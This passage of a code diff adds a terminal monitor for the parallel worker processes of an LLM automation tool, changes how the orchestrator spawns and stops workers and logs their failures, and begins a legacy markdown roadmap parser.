+        if (obj.type === "message_end") {
+          const cost = obj.message?.usage?.cost?.total;
+          if (typeof cost === "number") total += cost;
+        }
+      } catch { /* skip */ }
+    }
+    return total;
+  } catch {
+    return 0;
+  }
+}
+
+function queryRecentCompletions(basePath: string, mid: string): string[] {
+  const dbPath = join(basePath, ".gsd", "worktrees", mid, ".gsd", "gsd.db");
+  if (!existsSync(dbPath)) return [];
+  try {
+    const sql = `SELECT id, slice_id, one_liner FROM tasks WHERE milestone_id='${mid}' AND status='complete' AND completed_at IS NOT NULL ORDER BY completed_at DESC LIMIT 5`;
+    const result = spawnSync("sqlite3", [dbPath, sql], { timeout: 3000, encoding: "utf-8" });
+    const out = (result.stdout || "").trim();
+    if (!out || result.status !== 0) return [];
+    return out.split("\n").map((line) => {
+      const [taskId, sliceId, oneLiner] = line.split("|");
+      return `✓ ${mid}/${sliceId}/${taskId}${oneLiner ? ": " + oneLiner : ""}`;
+    });
+  } catch {
+    return [];
+  }
+}
+
+function collectWorkerData(basePath: string): WorkerView[] {
+  const mids = discoverWorkers(basePath);
+  const parallelDir = join(basePath, ".gsd", "parallel");
+  const workers: WorkerView[] = [];
+
+  for (const mid of mids) {
+    const status = readJsonSafe<StatusJson>(join(parallelDir, `${mid}.status.json`));
+    const lock = readJsonSafe<AutoLock>(join(basePath, ".gsd", "worktrees", mid, ".gsd", "auto.lock"));
+    const slices = querySliceProgress(basePath, mid);
+
+    const pid = lock?.pid || status?.pid || 0;
+    const alive = pid ? isPidAlive(pid) : false;
+
+    // Heartbeat: prefer status.json if PID matches, else use file mtime
+    let heartbeatAge = Infinity;
+    const statusPidMatches = status?.pid === pid && status?.lastHeartbeat;
+    if (statusPidMatches) {
+      heartbeatAge = Date.now() - status!.lastHeartbeat;
+    } else {
+      const mtimes: number[] = [];
+      const stdoutLog = join(parallelDir, `${mid}.stdout.log`);
+      const stderrLog = join(parallelDir, `${mid}.stderr.log`);
+      if (existsSync(stdoutLog)) mtimes.push(statSync(stdoutLog).mtimeMs);
+      if (existsSync(stderrLog)) mtimes.push(statSync(stderrLog).mtimeMs);
+      if (lock?.unitStartedAt) mtimes.push(new Date(lock.unitStartedAt).getTime());
+      if (mtimes.length > 0) heartbeatAge = Date.now() - Math.max(...mtimes);
+    }
+
+    let cost = status?.cost || 0;
+    if (cost === 0) cost = extractCostFromNdjson(basePath, mid);
+
+    const totalTasks = slices.reduce((sum, s) => sum + s.total, 0);
+    const doneTasks = slices.reduce((sum, s) => sum + s.done, 0);
+    const doneSlices = slices.filter((s) => s.status === "complete").length;
+
+    const elapsed = status?.startedAt
+      ? Date.now() - status.startedAt
+      : lock?.startedAt
+        ? Date.now() - new Date(lock.startedAt).getTime()
+        : 0;
+
+    // Errors from stderr (last 4KB, only new content)
+    const errors: string[] = [];
+    const stderrLog = join(parallelDir, `${mid}.stderr.log`);
+    if (existsSync(stderrLog)) {
+      const content = tailRead(stderrLog, 4096);
+      for (const line of content.trim().split("\n").slice(-5)) {
+        if (line.includes("error") || line.includes("Error") || line.includes("exited")) {
+          errors.push(line.trim());
+        }
+      }
+    }
+
+    workers.push({
+      mid,
+      pid,
+      alive,
+      state: alive ? "running" : (status?.state || "dead"),
+      cost,
+      heartbeatAge,
+      currentUnit: lock?.unitId || null,
+      unitType: lock?.unitType || null,
+      unitElapsed: lock?.unitStartedAt ? Date.now() - new Date(lock.unitStartedAt).getTime() : 0,
+      elapsed,
+      totalTasks,
+      doneTasks,
+      totalSlices: slices.length,
+      doneSlices,
+      slices,
+      errors,
+    });
+  }
+
+  return workers;
+}
+
+// ─── Rendering Helpers ────────────────────────────────────────────────────
+
+function unitTypeLabel(unitType: string | null): string {
+  const labels: Record<string, string> = {
+    "execute-task": "EXEC",
+    "research-slice": "RSRCH",
+    "plan-slice": "PLAN",
+    "complete-slice": "DONE",
+    "complete-task": "DONE",
+    "reassess": "ASSESS",
+    "validate": "VALID",
+    "reassess-roadmap": "ASSESS",
+  };
+  return labels[unitType || ""] || (unitType || "---").toUpperCase().slice(0, 5);
+}
+
+function progressBar(done: number, total: number, width: number): string {
+  if (total === 0) return "░".repeat(width);
+  const filled = Math.round((done / total) * width);
+  return "█".repeat(filled) + "░".repeat(width - filled);
+}
+
+function healthGlyph(alive: boolean, heartbeatAge: number): string {
+  if (!alive) return "○";
+  return "●";
+}
+
+// ─── Overlay Class ────────────────────────────────────────────────────────
+
+export class ParallelMonitorOverlay {
+  private tui: { requestRender: () => void };
+  private theme: Theme;
+  private onClose: () => void;
+  private basePath: string;
+  private refreshTimer: ReturnType<typeof setInterval>;
+  private workers: WorkerView[] = [];
+  private events: string[] = [];
+  private cachedLines?: string[];
+  private scrollOffset = 0;
+  private disposed = false;
+  private resizeHandler: (() => void) | null = null;
+
+  constructor(
+    tui: { requestRender: () => void },
+    theme: Theme,
+    onClose: () => void,
+    basePath?: string,
+  ) {
+    this.tui = tui;
+    this.theme = theme;
+    this.onClose = onClose;
+    this.basePath = basePath || process.cwd();
+
+    this.resizeHandler = () => {
+      if (this.disposed) return;
+      this.invalidate();
+      this.tui.requestRender();
+    };
+    process.stdout.on("resize", this.resizeHandler);
+
+    this.refresh();
+    this.refreshTimer = setInterval(() => this.refresh(), 5000);
+  }
+
+  private refresh(): void {
+    if (this.disposed) return;
+    this.workers = collectWorkerData(this.basePath);
+
+    // Collect completion events
+    for (const wk of this.workers) {
+      const completions = queryRecentCompletions(this.basePath, wk.mid);
+      for (const evt of completions) {
+        if (!this.events.includes(evt)) this.events.push(evt);
+      }
+    }
+    this.events = this.events.slice(-10);
+
+    this.cachedLines = undefined;
+    this.tui.requestRender();
+  }
+
+  dispose(): void {
+    this.disposed = true;
+    clearInterval(this.refreshTimer);
+    if (this.resizeHandler) {
+      process.stdout.removeListener("resize", this.resizeHandler);
+      this.resizeHandler = null;
+    }
+  }
+
+  handleInput(data: string): void {
+    if (matchesKey(data, Key.escape) || data === "q") {
+      this.dispose();
+      this.onClose();
+      return;
+    }
+    if (matchesKey(data, Key.down) || data === "j") {
+      this.scrollOffset++;
+      this.invalidate();
+      this.tui.requestRender();
+      return;
+    }
+    if (matchesKey(data, Key.up) || data === "k") {
+      this.scrollOffset = Math.max(0, this.scrollOffset - 1);
+      this.invalidate();
+      this.tui.requestRender();
+      return;
+    }
+  }
+
+  invalidate(): void {
+    this.cachedLines = undefined;
+  }
+
+  render(width: number): string[] {
+    if (this.cachedLines) return this.cachedLines;
+
+    const t = this.theme;
+    const lines: string[] = [];
+    const w = Math.max(width, 60);
+
+    // Header
+    const totalCost = this.workers.reduce((s, wk) => s + wk.cost, 0);
+    const aliveCount = this.workers.filter((wk) => wk.alive).length;
+    const now = new Date().toLocaleTimeString();
+
+    lines.push(t.bold(t.fg("accent", " GSD Parallel Monitor ")));
+    lines.push(
+      t.fg("muted", `  ${now}  │  ${aliveCount}/${this.workers.length} alive  │  Total: `) +
+      t.bold(`$${totalCost.toFixed(2)}`) +
+      t.fg("muted", "  │  5s refresh"),
+    );
+    lines.push(t.fg("muted", "─".repeat(w)));
+
+    if (this.workers.length === 0) {
+      lines.push("");
+      lines.push(t.fg("warning", "  No parallel workers found."));
+      lines.push(t.fg("muted", "  Run /gsd parallel start to begin."));
+    } else {
+      for (const wk of this.workers) {
+        lines.push("");
+
+        // Health + ID + state
+        const healthColor = wk.alive ? "success" : "error";
+        const glyph = healthGlyph(wk.alive, wk.heartbeatAge);
+        const stateText = wk.alive
+          ? t.fg("success", "RUNNING")
+          : t.fg("error", t.bold("DEAD"));
+        const heartbeatText = wk.heartbeatAge === Infinity
+          ? "never"
+          : formatDuration(wk.heartbeatAge) + " ago";
+
+        lines.push(
+          `  ${t.fg(healthColor, glyph)}  ${t.bold(wk.mid)}  ${stateText}  ` +
+          t.fg("muted", `PID ${wk.pid}  │  elapsed ${formatDuration(wk.elapsed)}  │  `) +
+          `cost ${t.bold("$" + wk.cost.toFixed(2))}  ` +
+          t.fg("muted", "│  heartbeat ") + t.fg(healthColor, heartbeatText),
+        );
+
+        // Current unit
+        if (wk.currentUnit) {
+          const phaseColor =
+            wk.unitType === "execute-task" ? "accent"
+            : wk.unitType === "research-slice" ? "warning"
+            : wk.unitType?.includes("complete") ? "success"
+            : "text";
+          lines.push(
+            `     ${t.fg("muted", "▸")} ${t.fg(phaseColor, unitTypeLabel(wk.unitType))}  ${wk.currentUnit}  ` +
+            t.fg("muted", `(${formatDuration(wk.unitElapsed)})`),
+          );
+        } else if (!wk.alive) {
+          lines.push(`     ${t.fg("muted", "▸")} ${t.fg("error", "stopped")}`);
+        } else {
+          lines.push(`     ${t.fg("muted", "▸ idle / between units")}`);
+        }
+
+        // Slice progress chips
+        if (wk.slices.length > 0) {
+          const chips = wk.slices.map((s) => {
+            const pct = s.total > 0 ? s.done / s.total : 0;
+            const color = s.status === "complete" ? "success" : pct > 0 ? "warning" : "muted";
+            return t.fg(color, `${s.id}:${s.done}/${s.total}`);
+          });
+          lines.push(`     ${t.fg("muted", "slices")}  ${chips.join("  ")}`);
+
+          // Task progress bar
+          const bar = progressBar(wk.doneTasks, wk.totalTasks, 25);
+          const pct = wk.totalTasks > 0 ? Math.round((wk.doneTasks / wk.totalTasks) * 100) : 0;
+          lines.push(
+            `     ${t.fg("muted", "tasks")}   ${t.fg("success", bar)}  ${wk.doneTasks}/${wk.totalTasks} ` +
+            t.fg("muted", `(${pct}%)  │  slices done ${wk.doneSlices}/${wk.totalSlices}`),
+          );
+        }
+
+        // Errors
+        for (const err of wk.errors.slice(-2)) {
+          const truncated = err.length > w - 10 ? err.slice(0, w - 11) + "…" : err;
+          lines.push(`     ${t.fg("error", "⚠ " + truncated)}`);
+        }
+      }
+    }
+
+    // Event feed
+    lines.push("");
+    lines.push(t.fg("muted", "─".repeat(w)));
+    lines.push(`  ${t.bold("Recent Events")}`);
+
+    if (this.events.length === 0) {
+      lines.push(t.fg("muted", "  No events yet..."));
+    } else {
+      for (const evt of this.events.slice(-8)) {
+        const mid = evt.match(/^✓ (M\d+)\//)?.[1] || "";
+        const truncated = evt.length > w - 10 ? evt.slice(0, w - 11) + "…" : evt;
+        lines.push(`  ${t.fg("muted", "│")} ${t.fg("accent", mid)} ${truncated.replace(/^✓ M\d+\//, "")}`);
+      }
+    }
+
+    // Footer
+    lines.push("");
+    const allDone = this.workers.length > 0 && this.workers.every((wk) => !wk.alive);
+    if (allDone) {
+      lines.push(t.bold(t.fg("success", "  ALL WORKERS COMPLETE")));
+      for (const wk of this.workers) {
+        lines.push(
+          `  ${wk.mid}  $${wk.cost.toFixed(2)}  │  ${wk.doneSlices}/${wk.totalSlices} slices  ` +
+          `${wk.doneTasks}/${wk.totalTasks} tasks  │  ${formatDuration(wk.elapsed)}`,
+        );
+      }
+      lines.push(`  ${t.bold("Total: $" + this.workers.reduce((s, wk) => s + wk.cost, 0).toFixed(2))}`);
+    }
+    lines.push(t.fg("muted", "  ESC/q to close  │  ↑↓ scroll"));
+
+    // Apply scroll — use terminal rows as height estimate
+    const termHeight = process.stdout.rows || 40;
+    const maxScroll = Math.max(0, lines.length - termHeight);
+    this.scrollOffset = Math.min(Math.max(this.scrollOffset, 0), maxScroll);
+    const visible = lines.slice(this.scrollOffset, this.scrollOffset + termHeight);
+    this.cachedLines = visible;
+    return visible;
+  }
+}
diff --git a/src/resources/extensions/gsd/parallel-orchestrator.ts b/src/resources/extensions/gsd/parallel-orchestrator.ts
index 86aa480f7..689de6ce2 100644
--- a/src/resources/extensions/gsd/parallel-orchestrator.ts
+++ b/src/resources/extensions/gsd/parallel-orchestrator.ts
@@ -21,7 +21,7 @@ import { join, dirname } from "node:path";
 import { fileURLToPath } from "node:url";
 import { gsdRoot } from "./paths.js";
 import { createWorktree, worktreePath } from "./worktree-manager.js";
-import { autoWorktreeBranch, runWorktreePostCreateHook } from "./auto-worktree.js";
+import { autoWorktreeBranch, runWorktreePostCreateHook, syncGsdStateToWorktree } from "./auto-worktree.js";
 import { nativeBranchExists } from "./native-git-bridge.js";
 import { readIntegrationBranch } from "./git-service.js";
 import { resolveParallelConfig } from "./preferences.js";
@@ -41,6 +41,7 @@ import {
   type ParallelCandidates,
 } from "./parallel-eligibility.js";
 import { getErrorMessage } from "./error-utils.js";
+import { logWarning } from "./workflow-logger.js";
 
 // ─── Types ─────────────────────────────────────────────────────────────────
 
@@ -52,8 +53,8 @@ export interface WorkerInfo {
   worktreePath: string;
   startedAt: number;
   state: "running" | "paused" | "stopped" | "error";
-  completedUnits: number;
   cost: number;
+  cleanup?: () => void;
 }
 
 export interface OrchestratorState {
@@ -82,7 +83,6 @@ export interface PersistedState {
     worktreePath: string;
     startedAt: number;
     state: "running" | "paused" | "stopped" | "error";
-    completedUnits: number;
     cost: number;
   }>;
   totalCost: number;
@@ -113,7 +113,6 @@ export function persistState(basePath: string): void {
         worktreePath: w.worktreePath,
         startedAt: w.startedAt,
         state: w.state,
-        completedUnits: w.completedUnits,
         cost: w.cost,
       })),
       totalCost: state.totalCost,
@@ -128,7 +127,7 @@ export function persistState(basePath: string): void {
     const tmp = dest + TMP_SUFFIX;
     writeFileSync(tmp, JSON.stringify(persisted, null, 2), "utf-8");
     renameSync(tmp, dest);
-  } catch { /* non-fatal */ }
+  } catch (e) { logWarning("parallel", `persist parallel state failed: ${(e as Error).message}`); }
 }
 
 /**
@@ -138,7 +137,7 @@ function removeStateFile(basePath: string): void {
   try {
     const p = stateFilePath(basePath);
     if (existsSync(p)) unlinkSync(p);
-  } catch { /* non-fatal */ }
+  } catch (e) { logWarning("parallel", `clear parallel state file failed: ${(e as Error).message}`); }
 }
 
 function isPidAlive(pid: number): boolean {
@@ -146,7 +145,8 @@ function isPidAlive(pid: number): boolean {
   try {
     process.kill(pid, 0);
     return true;
-  } catch {
+  } catch (e) {
+    logWarning("parallel", `pid alive check failed for pid ${pid}: ${(e as Error).message}`);
     return false;
   }
 }
@@ -178,7 +178,8 @@ export function restoreState(basePath: string): PersistedState | null {
     }
 
     return persisted;
-  } catch {
+  } catch (e) {
+    logWarning("parallel", `readParallelState JSON parse failed: ${(e as Error).message}`);
     return null;
   }
 }
@@ -192,13 +193,23 @@ function appendWorkerLog(basePath: string, milestoneId: string, chunk: string):
     const dir = join(gsdRoot(basePath), "parallel");
     if (!existsSync(dir)) mkdirSync(dir, { recursive: true });
     appendFileSync(workerLogPath(basePath, milestoneId), chunk, "utf-8");
-  } catch {
-    // Non-fatal — diagnostics should never break orchestration.
+  } catch (e) {
+    logWarning("parallel", `appendFileSync worker log failed for ${milestoneId}: ${(e as Error).message}`);
   }
 }
 
 function restoreRuntimeState(basePath: string): boolean {
-  if (state?.active) return true;
+  if (state?.active) {
+    // Verify at least one worker is alive — if all are in terminal states,
+    // the cached state is stale and we should fall through to cleanup.
+    const hasLiveWorker = [...state.workers.values()].some(
+      (w) => w.state !== "error" && w.state !== "stopped",
+    );
+    if (hasLiveWorker) return true;
+
+    // All workers dead — clear stale state so restoreState() can clean up.
+    state = null;
+  }
 
   const restored = restoreState(basePath);
   if (restored && restored.workers.length > 0) {
@@ -225,7 +236,6 @@ function restoreRuntimeState(basePath: string): boolean {
         worktreePath: diskStatus?.worktreePath ?? w.worktreePath,
         startedAt: w.startedAt,
         state: diskStatus?.state ?? w.state,
-        completedUnits: diskStatus?.completedUnits ?? w.completedUnits,
         cost: diskStatus?.cost ?? w.cost,
       });
     }
@@ -260,7 +270,6 @@ function restoreRuntimeState(basePath: string): boolean {
       worktreePath: status.worktreePath,
       startedAt: status.startedAt,
       state: status.state,
-      completedUnits: status.completedUnits,
       cost: status.cost,
     });
     state.totalCost += status.cost;
@@ -357,6 +366,16 @@ export async function startParallel(
 
   const config = resolveParallelConfig(prefs);
 
+  // Release any leftover state from a previous session before reassigning
+  if (state) {
+    for (const w of state.workers.values()) {
+      w.cleanup?.();
+      w.cleanup = undefined;
+      w.process = null;
+    }
+    state.workers.clear();
+  }
+
   // Try to restore from a previous crash
   const restored = restoreState(basePath);
   if (restored && restored.workers.length > 0) {
@@ -378,7 +397,6 @@ export async function startParallel(
         worktreePath: w.worktreePath,
         startedAt: w.startedAt,
         state: "running",
-        completedUnits: w.completedUnits,
         cost: w.cost,
       });
       adopted.push(w.milestoneId);
@@ -415,9 +433,8 @@ export async function startParallel(
       let wtPath: string;
       try {
         wtPath = createMilestoneWorktree(basePath, mid);
-      } catch {
-        // Worktree creation may fail in test environments or when git
-        // is not available. Fall back to a placeholder path.
+      } catch (e) {
+        logWarning("parallel", `createMilestoneWorktree fallback for ${mid}: ${(e as Error).message}`);
         wtPath = worktreePath(basePath, mid);
       }
 
@@ -429,7 +446,6 @@ export async function startParallel(
         worktreePath: wtPath,
         startedAt: now,
         state: "running",
-        completedUnits: 0,
         cost: 0,
       };
 
@@ -493,6 +509,11 @@ function createMilestoneWorktree(basePath: string, milestoneId: string): string
   // Run post-create hook if configured
   runWorktreePostCreateHook(basePath, info.path);
 
+  // Copy .gsd/ planning artifacts (milestones, CONTEXT, ROADMAP, etc.) from the
+  // project root into the worktree. Without this, workers for newly-planned
+  // milestones can't find their roadmap and exit immediately (#2184 Bug 4).
+  syncGsdStateToWorktree(basePath, info.path);
+
   return info.path;
 }
 
@@ -500,8 +521,19 @@ function createMilestoneWorktree(basePath: string, milestoneId: string): string
 
 /**
  * Spawn a worker process for a milestone.
- * The worker runs `gsd --print "/gsd auto"` in the milestone's worktree
+ * The worker runs `gsd headless --json auto` in the milestone's worktree
  * with GSD_MILESTONE_LOCK set to isolate state derivation.
+ *
+ * IMPORTANT: We use `headless --json auto` instead of `--print "/gsd auto"`.
+ * --print mode calls session.prompt() which returns immediately after the
+ * extension command handler fires, because auto-mode's ctx.newSession()
+ * resets the session and unblocks the outer prompt() await. This causes
+ * process.exit(0) to fire before any LLM work happens. See #2792.
+ *
+ * The headless subcommand uses an RPC client that keeps the process alive
+ * until auto-mode emits a terminal notification or the idle timer fires.
+ * It outputs NDJSON events to stdout (with --json), which our
+ * processWorkerLine() parser already understands.
  */
 export function spawnWorker(
   basePath: string,
@@ -518,23 +550,32 @@ export function spawnWorker(
 
   let child: ChildProcess;
   try {
-    child = spawn(process.execPath, [binPath, "--mode", "json", "--print", "/gsd auto"], {
+    const workerEnv: Record<string, string | undefined> = {
+      ...process.env,
+      GSD_MILESTONE_LOCK: milestoneId,
+      // Pass the real project root so workers don't need to re-derive it.
+      // Without this, process.cwd() resolves symlinks and the worktree
+      // path heuristic can match the user-level ~/.gsd instead of the
+      // project .gsd, causing writes to ~ and corrupting user config.
+      GSD_PROJECT_ROOT: basePath,
+      // Prevent workers from spawning their own parallel sessions
+      GSD_PARALLEL_WORKER: "1",
+    };
+
+    // Apply worker model override if configured, so workers use a cheaper
+    // model (e.g. Haiku) rather than inheriting the coordinator's model.
+    if (state.config.worker_model) {
+      workerEnv.GSD_WORKER_MODEL = state.config.worker_model;
+    }
+
+    child = spawn(process.execPath, [binPath, "headless", "--json", "auto"], {
       cwd: worker.worktreePath,
-      env: {
-        ...process.env,
-        GSD_MILESTONE_LOCK: milestoneId,
-        // Pass the real project root so workers don't need to re-derive it.
-        // Without this, process.cwd() resolves symlinks and the worktree
-        // path heuristic can match the user-level ~/.gsd instead of the
-        // project .gsd, causing writes to ~ and corrupting user config.
-        GSD_PROJECT_ROOT: basePath,
-        // Prevent workers from spawning their own parallel sessions
-        GSD_PARALLEL_WORKER: "1",
-      },
+      env: workerEnv,
       stdio: ["ignore", "pipe", "pipe"],
       detached: false,
     });
-  } catch {
+  } catch (e) {
+    logWarning("parallel", `spawnSync worker failed for ${milestoneId}: ${(e as Error).message}`);
     return false;
   }
 
@@ -558,9 +599,10 @@ export function spawnWorker(
   }
 
   // ── NDJSON stdout monitoring ────────────────────────────────────────
-  // Workers run with --mode json, emitting one JSON event per line.
-  // We parse message_end events to extract cost/token usage, keeping
-  // the coordinator's cost tracking in sync with actual API spend.
+  // Workers run via `headless --json`, which forwards all RPC events
+  // as NDJSON to stdout. We parse message_end events to extract
+  // cost/token usage, keeping the coordinator's cost tracking in sync
+  // with actual API spend.
   if (child.stdout) {
     let stdoutBuffer = "";
     child.stdout.on("data", (data: Buffer) => {
@@ -591,19 +633,33 @@ export function spawnWorker(
     pid: worker.pid,
     state: "running",
     currentUnit: null,
-    completedUnits: worker.completedUnits,
+    completedUnits: 0,
     cost: worker.cost,
     lastHeartbeat: Date.now(),
     startedAt: worker.startedAt,
     worktreePath: worker.worktreePath,
   });
 
+  // Store cleanup function to remove all listeners from the child process.
+  // This prevents listener accumulation when workers are respawned, since
+  // handler closures capture milestoneId and other data that would otherwise
+  // be retained indefinitely.
+  worker.cleanup = () => {
+    child.stdout?.removeAllListeners();
+    child.stderr?.removeAllListeners();
+    child.removeAllListeners();
+  };
+
   // Handle worker exit
   child.on("exit", (code) => {
     if (!state) return;
     const w = state.workers.get(milestoneId);
     if (!w) return;
 
+    // Remove all stream listeners to release closure references
+    w.cleanup?.();
+    w.cleanup = undefined;
+
     w.process = null;
     if (w.state === "stopped") return; // graceful stop, already handled
 
@@ -620,7 +676,7 @@ export function spawnWorker(
       pid: w.pid,
       state: w.state,
       currentUnit: null,
-      completedUnits: w.completedUnits,
+      completedUnits: 0,
       cost: w.cost,
       lastHeartbeat: Date.now(),
       startedAt: w.startedAt,
@@ -649,7 +705,8 @@ function resolveGsdBin(): string | null {
   let thisDir: string;
   try {
     thisDir = dirname(fileURLToPath(import.meta.url));
-  } catch {
+  } catch (e) {
+    logWarning("parallel", `dirname(fileURLToPath) failed: ${(e as Error).message}`);
     thisDir = process.cwd();
   }
   const candidates = [
@@ -677,7 +734,7 @@ function processWorkerLine(basePath: string, milestoneId: string, line: string):
   try {
     event = JSON.parse(line);
   } catch {
-    return; // Not valid JSON — skip (stderr leakage, debug output, etc.)
+    return; // Non-NDJSON lines (progress text, tool output) are expected — silent drop
   }
 
   const type = String(event.type ?? "");
@@ -702,14 +759,6 @@ function processWorkerLine(basePath: string, milestoneId: string, line: string):
       }
     }
 
-    // Track completed units (each message_end from assistant = progress)
-    if (msg.role === "assistant") {
-      const worker = state.workers.get(milestoneId);
-      if (worker) {
-        worker.completedUnits++;
-      }
-    }
-
     // Update session status file so dashboard sees live cost
     const worker = state.workers.get(milestoneId);
     if (worker) {
@@ -718,7 +767,7 @@ function processWorkerLine(basePath: string, milestoneId: string, line: string):
         pid: worker.pid,
         state: worker.state,
         currentUnit: null,
-        completedUnits: worker.completedUnits,
+        completedUnits: 0,
         cost: worker.cost,
         lastHeartbeat: Date.now(),
         startedAt: worker.startedAt,
@@ -737,7 +786,7 @@ function processWorkerLine(basePath: string, milestoneId: string, line: string):
         pid: worker.pid,
         state: worker.state,
         currentUnit: null,
-        completedUnits: worker.completedUnits,
+        completedUnits: 0,
         cost: worker.cost,
         lastHeartbeat: Date.now(),
         startedAt: worker.startedAt,
@@ -780,10 +829,15 @@ export async function stopParallel(
         } else if (worker.pid !== process.pid) {
           process.kill(worker.pid, "SIGTERM");
         }
-      } catch { /* process may already be dead */ }
+      } catch (e) { logWarning("parallel", `process.kill SIGTERM failed for pid ${worker.pid}: ${(e as Error).message}`); }
     }
 
-    const exitedAfterTerm = await waitForWorkerExit(worker, 750);
+    // Wait for the headless process to cascade SIGTERM to its RPC child.
+    // The headless signal handler calls client.stop() which sends SIGTERM
+    // to the RPC child and waits up to 1000ms. The previous 750ms window
+    // was insufficient — the parent got SIGKILL before the child died,
+    // leaving orphaned RPC processes holding auto.lock. See #2798.
+    const exitedAfterTerm = await waitForWorkerExit(worker, 3000);
     if (!exitedAfterTerm && worker.pid > 0) {
       try {
         if (worker.process) {
@@ -791,10 +845,14 @@ export async function stopParallel(
         } else if (worker.pid !== process.pid) {
           process.kill(worker.pid, "SIGKILL");
         }
-      } catch { /* process may already be dead */ }
+      } catch (e) { logWarning("parallel", `process.kill SIGKILL failed for pid ${worker.pid}: ${(e as Error).message}`); }
       await waitForWorkerExit(worker, 250);
     }
 
+    // Remove stream listeners before releasing the process handle
+    worker.cleanup?.();
+    worker.cleanup = undefined;
+
     // Update in-memory state
     worker.state = "stopped";
     worker.process = null;
@@ -880,6 +938,8 @@ export function refreshWorkerStatuses(
   for (const mid of staleIds) {
     const worker = state.workers.get(mid);
     if (worker) {
+      worker.cleanup?.();
+      worker.cleanup = undefined;
       worker.state = "error";
       worker.process = null;
     }
@@ -897,14 +957,15 @@ export function refreshWorkerStatuses(
     const diskStatus = statusMap.get(mid);
     if (!diskStatus) {
       if (!isPidAlive(worker.pid)) {
-        worker.state = worker.completedUnits > 0 ? "stopped" : "error";
+        worker.cleanup?.();
+        worker.cleanup = undefined;
+        worker.state = "error";
         worker.process = null;
       }
       continue;
     }
 
     worker.state = diskStatus.state;
-    worker.completedUnits = diskStatus.completedUnits;
     worker.cost = diskStatus.cost;
     worker.pid = diskStatus.pid;
   }
@@ -915,6 +976,18 @@ export function refreshWorkerStatuses(
     state.totalCost += worker.cost;
   }
 
+  // If all workers are in a terminal state (error/stopped), the orchestration
+  // is finished — deactivate and clean up so zombie workers don't persist.
+  const allDead = [...state.workers.values()].every(
+    (w) => w.state === "error" || w.state === "stopped",
+  );
+  if (allDead) {
+    state.active = false;
+    removeStateFile(basePath);
+    state = null;
+    return;
+  }
+
   // Persist updated state for crash recovery
   persistState(basePath);
 }
@@ -938,5 +1011,15 @@ export function isBudgetExceeded(): boolean {
 
 /** Reset orchestrator state. Called on clean shutdown. */
 export function resetOrchestrator(): void {
+  if (state) {
+    // Explicitly release all WorkerInfo references and run any pending
+    // cleanup callbacks so child process stream closures are freed.
+    for (const w of state.workers.values()) {
+      w.cleanup?.();
+      w.cleanup = undefined;
+      w.process = null;
+    }
+    state.workers.clear();
+  }
   state = null;
 }
diff --git a/src/resources/extensions/gsd/parsers-legacy.ts b/src/resources/extensions/gsd/parsers-legacy.ts
new file mode 100644
index 000000000..00ecb00c5
--- /dev/null
+++ b/src/resources/extensions/gsd/parsers-legacy.ts
@@ -0,0 +1,292 @@
+// GSD Extension - Legacy Parsers
+// parseRoadmap() and parsePlan() extracted from files.ts.
+// Used only by: md-importer.ts (migration), state.ts (pre-migration fallback),
+// markdown-renderer.ts (detectStaleRenders disk-vs-DB comparison),
+// commands-maintenance.ts (cold-path branch cleanup), and tests.
+//
+// NOT used in the dispatch loop or any hot-path runtime code.
+
+import { extractSection, parseBullets, extractBoldField, extractAllSections, registerCacheClearCallback } from './files.js';
+import { splitFrontmatter } from '../shared/frontmatter.js';
+import { nativeParseRoadmap, nativeParsePlanFile } from './native-parser-bridge.js';
+import { debugTime, debugCount } from './debug-logger.js';
+import { CACHE_MAX } from './constants.js';
+
+import type {
+  Roadmap, BoundaryMapEntry,
+  SlicePlan, TaskPlanEntry,
+} from './types.js';
+
+// Re-export parseRoadmapSlices so callers can import all legacy parsers from one module
+import { parseRoadmapSlices } from './roadmap-slices.js';
+export { parseRoadmapSlices };
+
+// ─── Parse Cache (local to this module) ───────────────────────────────────
+
+/** Fast composite key: length + first/mid/last 100 chars. The middle sample
+ *  prevents collisions when only a few characters change in the interior of
+ *  a file (e.g., a checkbox [ ] → [x] that doesn't alter length or endpoints). */
+function cacheKey(content: string): string {
+  const len = content.length;
+  const head = content.slice(0, 100);
+  const midStart = Math.max(0, Math.floor(len / 2) - 50);
+  const mid = len > 200 ? content.slice(midStart, midStart + 100) : '';
+  const tail = len > 100 ? content.slice(-100) : '';
+  return `${len}:${head}:${mid}:${tail}`;
+}
+
+const _parseCache = new Map<string, unknown>();
+
+function cachedParse<T>(content: string, tag: string, parseFn: (c: string) => T): T {
+  const key = tag + '|' + cacheKey(content);
+  if (_parseCache.has(key)) return _parseCache.get(key) as T;
+  if (_parseCache.size >= CACHE_MAX) _parseCache.clear();
+  const result = parseFn(content);
+  _parseCache.set(key, result);
+  return result;
+}
+
+/** Clear the legacy parser cache. Called by clearParseCache() in files.ts. */
+export function clearLegacyParseCache(): void {
+  _parseCache.clear();
+}
+
+// Register with files.ts so clearParseCache() also clears our cache
+registerCacheClearCallback(clearLegacyParseCache);
+
+// ─── Roadmap Parser ────────────────────────────────────────────────────────
+
+export function parseRoadmap(content: string): Roadmap {
+  return cachedParse(content, 'roadmap', _parseRoadmapImpl);
+}
+
+function _parseRoadmapImpl(content: string): Roadmap {
+  const stopTimer = debugTime("parse-roadmap");
+  // Try native parser first for better performance
+  const nativeResult = nativeParseRoadmap(content);
+  if (nativeResult) {
+    stopTimer({ native: true, slices: nativeResult.slices.length, boundaryEntries: nativeResult.boundaryMap.length });
+    debugCount("parseRoadmapCalls");
+    return nativeResult;
+  }
+
+  const lines = content.split('\n');
+
+  const h1 = lines.find(l => l.startsWith('# '));
+  const title = h1 ? h1.slice(2).trim() : '';
+  const vision = extractBoldField(content, 'Vision') || '';
+
+  const scSection = extractSection(content, 'Success Criteria', 2) ||
+    (() => {
+      const idx = content.indexOf('**Success Criteria:**');
+      if (idx === -1) return '';
+      const rest = content.slice(idx);
+      const nextSection = rest.indexOf('\n---');
+      const block = rest.slice(0, nextSection === -1 ? undefined : nextSection);
+      const firstNewline = block.indexOf('\n');
+      return firstNewline === -1 ? '' : block.slice(firstNewline + 1);
+    })();
+  const successCriteria = scSection ? parseBullets(scSection) : [];
+
+  // Slices
+  const slices = parseRoadmapSlices(content);
+
+  // Boundary map
+  const boundaryMap: BoundaryMapEntry[] = [];
+  const bmSection = extractSection(content, 'Boundary Map');
+
+  if (bmSection) {
+    const h3Sections = extractAllSections(bmSection, 3);
+    for (const [heading, sectionContent] of h3Sections) {
+      const arrowMatch = heading.match(/^(\S+)\s*→\s*(\S+)/);
+      if (!arrowMatch) continue;
+
+      const fromSlice = arrowMatch[1];
+      const toSlice = arrowMatch[2];
+
+      let produces = '';
+      let consumes = '';
